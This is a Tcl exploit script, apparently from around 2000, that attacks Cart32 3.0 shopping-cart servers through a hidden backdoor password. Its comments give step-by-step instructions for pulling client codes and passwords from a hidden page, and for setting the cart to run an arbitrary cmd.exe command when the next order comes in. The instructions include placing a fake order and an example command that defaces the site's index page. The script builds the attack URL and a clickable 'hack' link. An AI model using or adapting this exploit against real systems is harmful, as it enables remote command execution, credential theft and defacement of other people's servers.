wemilo.tcl

`#!/usr/bin/tcl  
# [r00tabega.security.labs]  
# www.r00tabega.com  
# code by futant  
# backdoor found by cerberus information security team  
# http://www.cerberus-infosec.com {/advcart32.html}  
  
# NOTE: This is terribly easy to exploit but it takes a few minutes  
#  
# Ok, heres how you do this.  
# Go to www.myserver.com/scripts/cart32.exe  
# If it says Cart32.exe 3.0, you are probably in luck  
#  
# Now, go to www.myserver.com/scripts/cart32.exe/cart32clientlist  
# This is where the author put a backdoor in.   
# type "wemilo" in the text field and hit the "Go" button  
#   
# Find the Client Code (username) that is for the site you are going   
# to hack for example, www.myshophite.com's client code might be MSS   
# or MYSHOP copy and paste the client code and client password into  
# notepad/pico/whatever.   
#  
# Now run this script. It is a TCL script so therefore requires TCL.  
# If you have a UNIX system, skip this part. If you are using windows  
# get TCL from http://www.scriptics.com and run it like this:  
# Start -> Run -> tclsh83 wemilo.tcl  
#  
#  
# This script will ask your for the hostname you are hacking,  
# the client code, and client password.  
#   
# Then it will ask you for the command you want to run on the remote  
# server.  
#  
# (Hint: Sometimes IIS will give you the HTML root directory if you   
# go to http://server.com/whatever.ida .idc, .ida or   
# /cgi-bin/whatever.pl)  
#  
# Then this script will write data to an html file on your machine in  
# the current directory called wemilo.html.   
# Open this file in netscape or IE and click on the  
# link. This will hopefully bring you to a Cart32 WWW page  
# that will have tons of shit on it and a text box with your command  
# in it. Scroll down to the bottom of the page and click "Save Cart32+ tab"  
#  
# Now the next order that comes through will run the command you selected.  
# Go back to the main page of the site and add some shit to a shopping cart.  
# If they accept check/money order fill in bogus crap and then confirm the order.  
# your command will then be run.  
#  
# This DOES work unlike most supposed exploits.  
#  
#  
# (IDK 2k)  
  
package require http  
  
puts "Cart32 exploit helper by futant"  
puts "\nEnter the the hostname you wish to hack\nDo NOT include http://"  
puts -nonewline "Host: "  
flush stdout  
set hostname [gets stdin]  
puts "\nOk now, type in the Client code that you wish to use.\nYou can get a client code by going to:\nhttp://$hostname/scripts/cart32.exe/Cart32ClientList\nand typing wemilo for the password."  
puts -nonewline "Client Code: "  
flush stdout  
set clientcode [gets stdin]  
  
puts "\nEnter the clients password: (Also obtained from the URL above)"  
puts -nonewline "Client Password: "  
flush stdout  
set clientpassword [gets stdin]  
  
puts "\nNow type the command you want to run on the remote server: "  
puts "(example: echo h4x0r3d by futant! > c:\\InetPub\\wwwroot\\index.html )"  
puts -nonewline "cmd /c "  
flush stdout  
set command [gets stdin]   
  
if {[catch {open wemilo.html w} fid]} {  
puts "ERROR: Couldnt open file for writing, copy and paste this URL.\n"  
set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"]  
puts "\nYour custom exploit string is:"  
puts "http://$hostname/scripts/c32web.exe?$endstring"  
}  
  
set endstring [::http::formatQuery TabName "Cart32+" Action "Save Cart32+ Tab" SaveTab "Cart32+" Client "$clientcode" ClientPassword "$clientpassword" Admin "" AdminPassword "" TabToSave "Cart32+" PlusTabToSave "Run External Program" UseCMDLine "Yes" CMDLine "cmd.exe /c $command"]  
puts "\nYour custom exploit string is:"  
puts "http://$hostname/scripts/c32web.exe?$endstring"  
puts $fid {<HTML>}  
puts $fid "<A HREF=\"http://$hostname/scripts/c32web.exe?$endstring\">Click here to hack $hostname</A>"  
puts $fid {</HTML>}  
close $fid  
puts "\nWrote to wemilo.html :]\nExiting..."  
  
# k-rad.`